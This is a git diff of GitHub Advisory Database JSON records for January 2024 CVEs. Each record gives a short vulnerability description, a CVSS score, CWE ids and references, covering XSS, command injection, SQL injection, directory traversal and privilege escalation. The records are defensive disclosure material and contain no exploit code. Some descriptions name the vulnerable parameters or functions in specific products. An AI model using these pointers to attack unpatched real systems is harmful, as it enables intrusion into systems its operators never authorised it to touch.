b/advisories/unreviewed/2024/01/GHSA-pgcw-8wrq-74f3/GHSA-pgcw-8wrq-74f3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pgcw-8wrq-74f3", - "modified": "2024-01-23T18:31:11Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T18:31:11Z", "aliases": [ "CVE-2023-45889" ], "details": "A Universal Cross Site Scripting (UXSS) vulnerability in ClassLink OneClick Extension through 10.8 allows remote attackers to inject JavaScript into any webpage. NOTE: this issue exists because of an incomplete fix for CVE-2022-48612.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T18:15:18Z" diff --git a/advisories/unreviewed/2024/01/GHSA-phf3-25c6-93hv/GHSA-phf3-25c6-93hv.json b/advisories/unreviewed/2024/01/GHSA-phf3-25c6-93hv/GHSA-phf3-25c6-93hv.json new file mode 100644 index 0000000000000..aec7cba3b377d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-phf3-25c6-93hv/GHSA-phf3-25c6-93hv.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phf3-25c6-93hv", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2023-6258" + ], + "details": "A security vulnerability has been identified in the pkcs11-provider, which is associated with Public-Key Cryptography Standards (PKCS#11). If exploited successfully, this vulnerability could result in a Bleichenbacher-like security flaw, potentially enabling a side-channel attack on PKCS#1 1.5 decryption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6258" + }, + { + "type": "WEB", + "url": "https://github.com/latchset/pkcs11-provider/pull/308" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2251062" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1300", + "CWE-203" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-phwp-w9r4-qjpx/GHSA-phwp-w9r4-qjpx.json b/advisories/unreviewed/2024/01/GHSA-phwp-w9r4-qjpx/GHSA-phwp-w9r4-qjpx.json index 14afa6e46921b..bece97c20d954 100644 --- a/advisories/unreviewed/2024/01/GHSA-phwp-w9r4-qjpx/GHSA-phwp-w9r4-qjpx.json +++ b/advisories/unreviewed/2024/01/GHSA-phwp-w9r4-qjpx/GHSA-phwp-w9r4-qjpx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-phwp-w9r4-qjpx", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-02-02T21:31:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2024-22545" ], "details": "TRENDnet TEW-824DRU version 1.04b01 is vulnerable to Command Injection via the system.ntp.server in the sub_420AE0() function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T08:15:42Z" diff --git a/advisories/unreviewed/2024/01/GHSA-pj8j-f4gx-wrgf/GHSA-pj8j-f4gx-wrgf.json b/advisories/unreviewed/2024/01/GHSA-pj8j-f4gx-wrgf/GHSA-pj8j-f4gx-wrgf.json new file mode 100644 index 0000000000000..5c3ddd3bd664a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pj8j-f4gx-wrgf/GHSA-pj8j-f4gx-wrgf.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj8j-f4gx-wrgf", + "modified": "2024-01-31T03:30:30Z", + "published": "2024-01-31T03:30:30Z", + "aliases": [ + "CVE-2023-2439" + ], + "details": "The UserPro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'userpro' shortcode in versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2439" + }, + { + "type": "WEB", + "url": "https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/21cb424c-4efd-4c12-a08a-6d574f118c28?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-pjmm-vvvh-7xfj/GHSA-pjmm-vvvh-7xfj.json b/advisories/unreviewed/2024/01/GHSA-pjmm-vvvh-7xfj/GHSA-pjmm-vvvh-7xfj.json new file mode 100644 index 0000000000000..375d570d35190 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pjmm-vvvh-7xfj/GHSA-pjmm-vvvh-7xfj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjmm-vvvh-7xfj", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22310" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Formzu Inc. Formzu WP allows Stored XSS.This issue affects Formzu WP: from n/a through 1.6.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22310" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/formzu-wp/wordpress-formzu-wp-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T17:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-ppwj-j5xp-6rmh/GHSA-ppwj-j5xp-6rmh.json b/advisories/unreviewed/2024/01/GHSA-ppwj-j5xp-6rmh/GHSA-ppwj-j5xp-6rmh.json index 2545dc14e0b1c..4e2f34f40a474 100644 --- a/advisories/unreviewed/2024/01/GHSA-ppwj-j5xp-6rmh/GHSA-ppwj-j5xp-6rmh.json +++ b/advisories/unreviewed/2024/01/GHSA-ppwj-j5xp-6rmh/GHSA-ppwj-j5xp-6rmh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ppwj-j5xp-6rmh", - "modified": "2024-01-26T06:30:30Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T06:30:30Z", "aliases": [ "CVE-2023-38319" ], "details": "An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the FAS key entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T05:15:12Z" diff --git a/advisories/unreviewed/2024/01/GHSA-pqh2-qcg3-9x62/GHSA-pqh2-qcg3-9x62.json b/advisories/unreviewed/2024/01/GHSA-pqh2-qcg3-9x62/GHSA-pqh2-qcg3-9x62.json index 5536f42eb9519..729f9db8db513 100644 --- a/advisories/unreviewed/2024/01/GHSA-pqh2-qcg3-9x62/GHSA-pqh2-qcg3-9x62.json +++ b/advisories/unreviewed/2024/01/GHSA-pqh2-qcg3-9x62/GHSA-pqh2-qcg3-9x62.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pqh2-qcg3-9x62", - "modified": "2024-01-25T21:32:14Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T21:32:14Z", "aliases": [ "CVE-2023-41474" ], "details": "Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-22" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T20:15:36Z" diff --git a/advisories/unreviewed/2024/01/GHSA-pqpm-xc7w-528j/GHSA-pqpm-xc7w-528j.json b/advisories/unreviewed/2024/01/GHSA-pqpm-xc7w-528j/GHSA-pqpm-xc7w-528j.json new file mode 100644 index 0000000000000..50eefc80d13de --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pqpm-xc7w-528j/GHSA-pqpm-xc7w-528j.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqpm-xc7w-528j", + "modified": "2024-01-31T18:31:25Z", + "published": "2024-01-31T18:31:25Z", + "aliases": [ + "CVE-2024-0219" + ], + "details": "In Telerik JustDecompile versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component.  In an environment where an existing Telerik JustDecompile install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0219" + }, + { + "type": "WEB", + "url": "https://docs.telerik.com/devtools/justdecompile/knowledge-base/legacy-installer-vulnerability" + }, + { + "type": "WEB", + "url": "https://www.telerik.com/products/decompiler.aspx" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T16:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-pv96-p9pp-9m2m/GHSA-pv96-p9pp-9m2m.json b/advisories/unreviewed/2024/01/GHSA-pv96-p9pp-9m2m/GHSA-pv96-p9pp-9m2m.json index d11376d4f5dc9..a28b60af79221 100644 --- a/advisories/unreviewed/2024/01/GHSA-pv96-p9pp-9m2m/GHSA-pv96-p9pp-9m2m.json +++ b/advisories/unreviewed/2024/01/GHSA-pv96-p9pp-9m2m/GHSA-pv96-p9pp-9m2m.json @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-pvh3-5rhh-wcg5/GHSA-pvh3-5rhh-wcg5.json b/advisories/unreviewed/2024/01/GHSA-pvh3-5rhh-wcg5/GHSA-pvh3-5rhh-wcg5.json index 0fa83a84c5434..48e423de06a1c 100644 --- a/advisories/unreviewed/2024/01/GHSA-pvh3-5rhh-wcg5/GHSA-pvh3-5rhh-wcg5.json +++ b/advisories/unreviewed/2024/01/GHSA-pvh3-5rhh-wcg5/GHSA-pvh3-5rhh-wcg5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pvh3-5rhh-wcg5", - "modified": "2024-01-18T00:30:17Z", + "modified": "2024-01-29T18:31:46Z", "published": "2024-01-18T00:30:17Z", "aliases": [ "CVE-2023-6340" ], "details": "SonicWall Capture Client version 3.7.10, NetExtender client version 10.2.337 and earlier versions are installed with sfpmonitor.sys driver. The driver has been found to be vulnerable to Denial-of-Service (DoS) caused by Stack-based Buffer Overflow vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,10 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-18T00:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json b/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json index 88a93800a86b3..fd90cc26061c8 100644 --- a/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json +++ b/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20983" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0009/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-pw8j-6xcp-c453/GHSA-pw8j-6xcp-c453.json b/advisories/unreviewed/2024/01/GHSA-pw8j-6xcp-c453/GHSA-pw8j-6xcp-c453.json index 36a34b2d1b334..54f4459501b65 100644 --- a/advisories/unreviewed/2024/01/GHSA-pw8j-6xcp-c453/GHSA-pw8j-6xcp-c453.json +++ b/advisories/unreviewed/2024/01/GHSA-pw8j-6xcp-c453/GHSA-pw8j-6xcp-c453.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pw8j-6xcp-c453", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0750" ], "details": "A bug in popup notifications delay calculation could have made it possible for an attacker to trick a user into granting permissions. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -43,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-pwgf-w5vm-vm95/GHSA-pwgf-w5vm-vm95.json b/advisories/unreviewed/2024/01/GHSA-pwgf-w5vm-vm95/GHSA-pwgf-w5vm-vm95.json new file mode 100644 index 0000000000000..8e0e4f5cf751b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pwgf-w5vm-vm95/GHSA-pwgf-w5vm-vm95.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pwgf-w5vm-vm95", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-4552" + ], + "details": "Improper Input Validation vulnerability in OpenText AppBuilder on Windows, Linux allows Probe System Files.\n\nAn authenticated AppBuilder user with the ability to create or manage existing databases can leverage them to exploit the AppBuilder server - including access to its local file system.\n\n\nThis issue affects AppBuilder: from 21.2 before 23.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4552" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_search&kb_category=61648712db61781068cfd6c4e296197b" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-pwq2-rpq6-5x8x/GHSA-pwq2-rpq6-5x8x.json b/advisories/unreviewed/2024/01/GHSA-pwq2-rpq6-5x8x/GHSA-pwq2-rpq6-5x8x.json new file mode 100644 index 0000000000000..66232a842f9ae --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pwq2-rpq6-5x8x/GHSA-pwq2-rpq6-5x8x.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pwq2-rpq6-5x8x", + "modified": "2024-01-30T03:30:30Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2024-1024" + ], + "details": "A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. This vulnerability affects unknown code of the component New Account Handler. The manipulation of the argument First Name/Last Name with the input leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252292.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1024" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252292" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252292" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-px84-gp9q-g6w9/GHSA-px84-gp9q-g6w9.json b/advisories/unreviewed/2024/01/GHSA-px84-gp9q-g6w9/GHSA-px84-gp9q-g6w9.json new file mode 100644 index 0000000000000..4cb2b67079b31 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-px84-gp9q-g6w9/GHSA-px84-gp9q-g6w9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px84-gp9q-g6w9", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2024-22523" + ], + "details": "Directory Traversal vulnerability in Qiyu iFair version 23.8_ad0 and before, allows remote attackers to obtain sensitive information via uploadimage component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22523" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/for82/vdzwqe/sc8ictw8poo8v5gl" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T09:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-q37p-g696-qhwm/GHSA-q37p-g696-qhwm.json b/advisories/unreviewed/2024/01/GHSA-q37p-g696-qhwm/GHSA-q37p-g696-qhwm.json index f982583601151..56b3b9c51dd54 100644 --- a/advisories/unreviewed/2024/01/GHSA-q37p-g696-qhwm/GHSA-q37p-g696-qhwm.json +++ b/advisories/unreviewed/2024/01/GHSA-q37p-g696-qhwm/GHSA-q37p-g696-qhwm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q37p-g696-qhwm", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-31T15:30:19Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2021-42142" ], "details": "An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers mishandle the early use of a large epoch number. This vulnerability allows remote attackers to cause a denial of service and false-positive packet drops.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-755" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json b/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json index baf0c0824d602..89bea21f2b8b4 100644 --- a/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json +++ b/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://support.apple.com/en-us/HT213941" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-q6vx-6v63-ffqp/GHSA-q6vx-6v63-ffqp.json b/advisories/unreviewed/2024/01/GHSA-q6vx-6v63-ffqp/GHSA-q6vx-6v63-ffqp.json new file mode 100644 index 0000000000000..f1d112286e2b1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-q6vx-6v63-ffqp/GHSA-q6vx-6v63-ffqp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6vx-6v63-ffqp", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24140" + ], + "details": "Sourcecodester Daily Habit Tracker App 1.0 allows SQL Injection via the parameter 'tracker.'", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24140" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/Daily_Habit_Tracker_App_SQL_Injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-q87w-hjgf-6vfw/GHSA-q87w-hjgf-6vfw.json b/advisories/unreviewed/2024/01/GHSA-q87w-hjgf-6vfw/GHSA-q87w-hjgf-6vfw.json new file mode 100644 index 0000000000000..77ff5e2ddc0ee --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-q87w-hjgf-6vfw/GHSA-q87w-hjgf-6vfw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q87w-hjgf-6vfw", + "modified": "2024-01-29T12:30:20Z", + "published": "2024-01-29T12:30:20Z", + "aliases": [ + "CVE-2024-23791" + ], + "details": "Insertion of debug information into log file during building the elastic search index allows reading of sensitive information from articles.This issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023.X through 2023.1.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23791" + }, + { + "type": "WEB", + "url": "https://otrs.com/release-notes/otrs-security-advisory-2024-02/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-q9p8-42p3-gq3h/GHSA-q9p8-42p3-gq3h.json b/advisories/unreviewed/2024/01/GHSA-q9p8-42p3-gq3h/GHSA-q9p8-42p3-gq3h.json index ef73c7d73c9af..2887b593a2723 100644 --- a/advisories/unreviewed/2024/01/GHSA-q9p8-42p3-gq3h/GHSA-q9p8-42p3-gq3h.json +++ b/advisories/unreviewed/2024/01/GHSA-q9p8-42p3-gq3h/GHSA-q9p8-42p3-gq3h.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q9p8-42p3-gq3h", - "modified": "2024-01-25T09:30:21Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T09:30:21Z", "aliases": [ "CVE-2023-33759" ], "details": "SpliceCom Maximiser Soft PBX v1.5 and before does not restrict excessive authentication attempts, allowing attackers to bypass authentication via a brute force attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-307" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T08:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-qcxp-xh47-3g32/GHSA-qcxp-xh47-3g32.json b/advisories/unreviewed/2024/01/GHSA-qcxp-xh47-3g32/GHSA-qcxp-xh47-3g32.json new file mode 100644 index 0000000000000..b257992202222 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qcxp-xh47-3g32/GHSA-qcxp-xh47-3g32.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcxp-xh47-3g32", + "modified": "2024-01-29T18:31:49Z", + "published": "2024-01-29T18:31:49Z", + "aliases": [ + "CVE-2024-1006" + ], + "details": "A vulnerability was found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This issue affects some unknown processing of the file application/index/common.php of the component Cookie Handler. The manipulation of the argument Nod_User_Id/Nod_User_Token leads to improper authentication. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252275. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1006" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/vWuVlU2eg79t" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252275" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252275" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-qfm4-9qqj-3w82/GHSA-qfm4-9qqj-3w82.json b/advisories/unreviewed/2024/01/GHSA-qfm4-9qqj-3w82/GHSA-qfm4-9qqj-3w82.json index 665fb3f569d62..8eac0d04bea63 100644 --- a/advisories/unreviewed/2024/01/GHSA-qfm4-9qqj-3w82/GHSA-qfm4-9qqj-3w82.json +++ b/advisories/unreviewed/2024/01/GHSA-qfm4-9qqj-3w82/GHSA-qfm4-9qqj-3w82.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qfm4-9qqj-3w82", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2024-22651" ], "details": "There is a command injection vulnerability in the ssdpcgi_main function of cgibin binary in D-Link DIR-815 router firmware v1.04.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T16:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-qghg-5fph-q28c/GHSA-qghg-5fph-q28c.json b/advisories/unreviewed/2024/01/GHSA-qghg-5fph-q28c/GHSA-qghg-5fph-q28c.json new file mode 100644 index 0000000000000..dd4e0f743641f --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-qghg-5fph-q28c/GHSA-qghg-5fph-q28c.json @@ -0,0 +1,46 @@ +{ + "schema_version": 